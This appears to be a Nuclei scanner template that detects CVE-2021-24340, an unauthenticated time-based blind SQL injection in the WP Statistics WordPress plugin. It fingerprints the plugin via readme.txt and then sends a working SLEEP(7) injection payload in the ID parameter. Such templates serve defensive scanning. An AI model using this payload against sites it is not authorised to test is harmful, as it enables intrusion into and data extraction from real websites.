id: CVE-2021-24340 info: name: WordPress Statistics <13.0.8 - Blind SQL Injection author: lotusdll,j4vaovo severity: high description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability. reference: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c - https://nvd.nist.gov/vuln/detail/CVE-2021-24340 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-24340 cwe-id: CWE-89 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:*:*:* epss-score: 0.03512 tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb metadata: max-request: 1 http: - raw: - | GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 Host: {{Hostname}} - | @timeout: 15s GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'contains(body_1, "WP Statistics")' condition: and - type: dsl dsl: - 'duration_2>=7' - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and